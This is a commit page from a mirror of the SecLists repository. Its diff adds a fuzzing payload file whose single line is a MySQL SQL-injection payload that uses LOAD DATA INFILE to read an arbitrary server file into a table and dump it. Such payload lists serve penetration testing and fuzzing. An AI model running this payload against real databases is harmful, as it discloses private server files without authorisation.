mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-07-27 17:11:08 +00:00
Quick clean up of locations
This commit is contained in:
@@ -0,0 +1,3 @@
|
||||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
Reference in New Issue
Block a user